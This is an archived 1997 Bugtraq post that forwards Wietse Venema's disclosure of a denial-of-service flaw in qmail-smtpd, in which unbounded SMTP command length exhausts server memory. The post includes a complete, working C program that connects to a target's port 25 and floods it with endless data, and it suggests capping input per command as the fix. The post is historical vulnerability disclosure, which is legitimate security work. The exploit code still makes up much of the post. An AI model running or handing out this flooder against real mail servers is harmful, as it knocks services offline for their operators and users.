Bugtraq mailing list archives
Denial of service (qmail-smtpd)
From: j () EIDER NET (Frank DENIS -Jedi/Sector One-)
Date: Thu, 12 Jun 1997 00:20:44 +0200
Forwarded message:
From djb-qmail-return-3259-j=4u.net () koobera math uic edu Wed Jun 11 21:31:02 1997
Delivered-To: j () mail donald fr Delivered-To: j () mail-gw donald fr Delivered-To: j-one-j () rtc-one net Mailing-List: contact djb-qmail-help () koobera math uic edu; run by ezmlm Delivered-To: mailing list djb-qmail () koobera math uic edu Delivered-To: djb-qmail () koobera math uic edu Message-Id: <199706112130.QAA09923 () spike porcupine org> Subject: Denial of service (qmail-smtpd) To: djb-qmail () koobera math uic edu Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT) From: wietse () wzv win tue nl (Wietse Venema) Organization: Wietse Venema on sabattical leave, 14 Nosband Avenue 4J, White Plains, NY 10605, USA X-Phone: +1 914 948 7129 X-Time-Zone: USA EST, 6 hours behind central European time X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit While implementing my own mailer, I went over the qmail source code and noticed that qmail is susceptible to a very trivial denial of service attack. By sending SMTP commands of unlimited length, an attacker can make the machine run out of memory, thus rendering it completely unusable. Below is a little program that demonstrates the problem. When I wrote this I was in C mode; it could probably be done with a much smaller PERL program. Fix: put some upper bound on the amount of data that qmail-smtpd reads per command. I am sending to the list, because it appears that DJB is ignoring all my email. Oh well. Be a good sport, Dan, and take care of it. Wietse /* * qmail-dos-1 - run a qmail system out of swap space by feeding long SMTP * commands. * * Usage: qmail-dos-1 hostname * * Author: Wietse Venema. The author is not responsible for abuse of this * program. Use at your own risk. Batteries not included. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdarg.h> #include <errno.h> #include <stdio.h> void fatal(char *fmt,...) { va_list ap; va_start(ap, fmt); vfprintf(stderr, fmt, ap); va_end(ap); putc('\n', stderr); exit(1); } int main(int argc, char **argv) { struct sockaddr_in sin; struct hostent *hp; char buf[BUFSIZ]; int sock; FILE *fp; if (argc != 2) fatal("usage: %s host", argv[0]); if ((hp = gethostbyname(argv[1])) == 0) fatal("host %s not found", argv[1]); memset((char *) &sin, 0, sizeof(sin)); sin.sin_family = AF_INET; memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr)); sin.sin_port = htons(25); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) fatal("socket: %s", strerror(errno)); if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0) fatal("connect to %s: %s", argv[1], strerror(errno)); if ((fp = fdopen(sock, "r+")) == 0) fatal("fdopen: %s", strerror(errno)); if (fgets(buf, sizeof(buf), fp) == 0) fatal("connection lost"); memset(buf, 'X', sizeof(buf)); fseek(fp, 0L, SEEK_SET); while (fputs(buf, fp) != EOF) /* void */ ; } -- -=- Frank DENIS aka Jedi/Sector One -=- <j () djweb org> <j () donald fr> <j () eider net>
Current thread:
- wu-ftpd 2.4.2-beta-13 default UMASK hole Roy M. Hooper (Jun 11)
- wu-ftpd 2.4.2-beta-13 default UMASK hole Steve VanDevender (Jun 11)
- Re: wu-ftpd 2.4.2-beta-13 default UMASK hole George Staikos (Jun 11)
- Denial of service (qmail-smtpd) Frank DENIS -Jedi/Sector One- (Jun 11)
- qmail-dos-2.c, another denial of service attack Frank DENIS -Jedi/Sector One- (Jun 11)
- DNS abuse Jordi Murgo (Jun 11)
- Solaris x86 buffer overflows jim bresler (Jun 12)
- CERT Advisory CA-97.18 - Vulnerability in the at(1) program Aleph One (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program The Nolander (Jun 12)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Thomas Koenig (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Adam Morrison (Jun 15)
- Netscape Exploit root (Jun 14)
- Bug in SGI's /cgi-bin/handler Razvan Dragomirescu (Jun 14)
- Re: CERT Advisory CA-97.18 - Vulnerability in the at(1) program Rick Byers (Jun 12)